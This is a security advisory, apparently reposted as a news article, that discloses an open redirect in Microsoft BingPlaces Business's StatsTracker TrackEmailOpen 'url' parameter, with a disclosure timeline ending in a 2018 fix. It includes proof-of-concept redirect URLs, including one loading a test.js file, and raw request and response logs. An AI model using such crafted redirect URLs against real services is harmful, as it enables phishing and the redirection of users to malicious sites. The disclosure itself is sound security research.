Microsoft BingPlaces Business - (url) Redirect Vulnerability

Editorial_Staff_Team's picture

Open Redirect in Microsoft BingPlaces Business uncovered

Security researchers of the vulnerability laboratory uncovered this week an open redirect vulnerability in the famous microsoft bingplaces business web-application. The issue allows to redirect users by client-side get method request to external malformed or malicious sources.

The open redirect security vulnerability is located in the `url` parameter of the `TrackEmailOpen` function in the `StatsTracker` module. The `url` parameter has no restriction to the requested url content. Remote attackers are able to redirect client-side get method requests because of a non restricted url parameter. The attack vector of the vulnerability is non-persistent and the request method to execute is get. The vulnerability is a classic open redirect web vulnerability.

Vulnerable Module(s):
[+] StatsTracker

Vulnerable Function(s):
[+] TrackEmailOpen

Vulnerable Parameter(s):
[+] url

PoC: Example
https://www.bingplaces.com/StatsTracker/TrackEmailOpen?&url=[External Redirect]

PoC: Exploitation
https://www.bingplaces.com/StatsTracker/TrackEmailOpen?&url=https%3A%2F%2Fwww.vulnerability-lab.com%2F
https://www.bingplaces.com/StatsTracker/TrackEmailOpen?&url=https%3A%2F%2Fwww.vulnerability-lab.com%2Ftest.js

Microsoft deliveres via the bingplaces business application service emails. In the service emails is the tracker attached as function, that redirects the user to the internal dashboard source. We was able to easily exploit the issue after we figured out how the function is in usage. The we manipulated the url parameter to redirect the victim on a simple get method request.

--- PoC Sesson Logs (GET) ---
https://www.bingplaces.com/StatsTracker/TrackEmailOpen?&url=https%3A%2F%...
Host: www.bingplaces.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Cookie: ASP.NET_SessionId=sulxsx3e2sznpufzpogp4ywp; BingPlacesCulture=en-US
Connection: keep-alive
Upgrade-Insecure-Requests: 1

-
GET: HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8

Location: https://www.vulnerability-lab.com/
Server: Microsoft-IIS/8.5
X-AspNetMvc-Version: 5.2
X-AspNet-Version: 4.0.30319
X-Content-Type-Options: nosniff
X-Powered-By: ASP.NET
Content-Length: 151

https://www.vulnerability-lab.com/
Host: www.vulnerability-lab.com

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Cookie: PHPSESSID=kdsucolj3rarb
Connection: keep-alive
Upgrade-Insecure-Requests: 1

-
GET: HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin
Content-Length: 96002

Reference(s):
https://www.bingplaces.com/
https://www.bingplaces.com/StatsTracker/
https://www.bingplaces.com/StatsTracker/TrackEmailOpen

Advisory: https://www.vulnerability-lab.com/get_content.php?id=2167

The vulnerability was identified in august 2018 and reported in september 2018 to the microsoft security response center. The case was tracked using the following id CRM:0461060024. The security issue was finally resolved by the bing developer team 2018-11-11. Shortly after the issue author will receive a public acknowledgement at the online service page of microsoft. We would like to thank microsoft and look forward to further cooperation with the msrc team.

 

Rate this article: 
Average: 5 (2 votes)

Add new comment

Plain text

  • No HTML tags allowed.
  • Web page addresses and e-mail addresses turn into links automatically.
  • Lines and paragraphs break automatically.